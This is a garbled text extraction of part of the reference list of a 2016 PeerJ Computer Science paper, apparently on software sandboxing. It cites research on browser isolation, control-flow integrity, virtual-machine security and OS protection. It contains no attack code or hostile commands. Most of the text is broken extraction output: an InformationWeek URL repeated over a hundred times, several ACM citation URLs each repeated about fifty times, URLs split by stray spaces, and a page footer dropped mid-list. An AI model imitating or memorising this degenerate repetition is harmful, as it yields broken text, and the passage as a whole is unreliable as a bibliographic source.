http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1251398.1251415 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dl.acm.org/citation.cfm?id=1298455.1298470 http://dx.doi.org/10.7717/peerj-cs.43 Chang W, Streiff B, Lin C. 2008. Efficient and extensible security enforcement using dynamic data flow analysis. In: ACM conference on computer and communications security (CCS) (CCS ’08). New York: ACM, 39–50. Chen EY, Bau J, Reis C, Barth A, Jackson C. 2011. App isolation: get the security of multiple browsers with just one. In: ACM conference on computer and communications security (CCS) (CCS ’11). New York: ACM, 227–238. Chen S, Ross D, Wang Y-M. 2007. An analysis of browser domain-isolation bugs and a light-weight transparent defense mechanism. In: ACM conference on computer and communications security (CCS) (CCS ’07). New York: ACM, 2–11. Coker Z, Maass M, Ding T, Le Goues C, Sunshine J. 2015. Evaluating the flexibility of the Java sandbox. In: Annual computer security applications conference (ACSAC 2015). New York: ACM, 1–10. Cox RS, Gribble SD, Levy HM, Hansen JG. 2006. A safety-oriented platform for web applications. In: IEEE symposium on security and privacy (SP ’06). Washington, DC: IEEE Computer Society, 350–364. Criswell J, Dautenhahn N, Adve V. 2014. KCoFI: complete control-flow integrity for commodity operating system kernels. In: IEEE symposium on security and privacy. Washington, DC: IEEE, 292–307. Criswell J, Lenharth A, Dhurjati D, Adve V. 2007. Secure virtual architecture: a safe execution environment for commodity operating systems. In: ACM symposium on operating systems principles (SOSP) (SOSP ’07). New York: ACM, 351–366. De Groef W, Devriese D, Nikiforakis N, Piessens F. 2012. FlowFox: a web browser with flexible and precise information flow control. In: ACM conference on computer and communications security (CCS) (CCS ’12). New York: ACM, 748–759. Denzin NK, Lincoln YS. 2011. Introduction: the discipline and practice of qualitative research. In: The sage handbook of qualitative research. 4th edition. Thousand Oaks: Sage. Dunn AM, Lee MZ, Jana S, Kim S, Silberstein M, Xu Y, Shmatikov V, Witchel E. 2012. Eternal sunshine of the spotless machine: protecting privacy with ephemeral channels. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI’12). Berkeley: USENIX Association, 61–75. Available at http://dl.acm.org/citation.cfm?id=2387880.2387887. Efstathopoulos P, Krohn M, VanDeBogart S, Frey C, Ziegler D, Kohler E, Mazières D, Kaashoek F, Morris R. 2005. Labels and event processes in the asbestos operating system. In: ACM symposium on operating systems principles (SOSP) (SOSP ’05). New York: ACM, 17–30. Erlingsson Ú, Abadi M, Vrable M, Budiu M, Necula GC. 2006. XFI: software guards for system address spaces. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI ’06). Berkeley: USENIX Association, 75–88. Available at http://dl.acm.org/citation.cfm? id=1298455.1298463. Feldman AJ, Zeller WP, Freedman MJ, Felten EW. 2010. SPORC: group collaboration using untrusted cloud resources. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI’10). Berkeley: USENIX Association, 1. Available at http://dl. acm.org/citation.cfm?id=1924943.1924967. Garfinkel T, Pfaff B, Chow J, Rosenblum M, Boneh D. 2003. Terra: a virtual machine-based platform for trusted computing. In: ACM symposium on operating systems principles (SOSP) (SOSP ’03). New York: ACM, 193–206. Geneiatakis D, Portokalidis G, Kemerlis VP, Keromytis AD. 2012. Adaptive defenses for commodity software through virtual application partitioning. In: ACM conference on computer and communications security (CCS) (CCS ’12). New York: ACM, 133–144. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 31/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=2387880.2387887 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1298455.1298463 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dl.acm.org/citation.cfm?id=1924943.1924967 http://dx.doi.org/10.7717/peerj-cs.43 Giffin DB, Levy A, Stefan D, Terei D, Mazières D, Mitchell JC, Russo A. 2012. Hails: protecting data privacy in untrusted web applications. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI’12). Berkeley: USENIX Association, 47–60. Available at http: //dl.acm.org/citation.cfm?id=2387880.2387886. Giuffrida C, Kuijsten A, Tanenbaum AS. 2012. Enhanced operating system security through efficient and fine-grained address space randomization. In: USENIX security (Security’12). Berkeley: USENIX Association, 40–40. 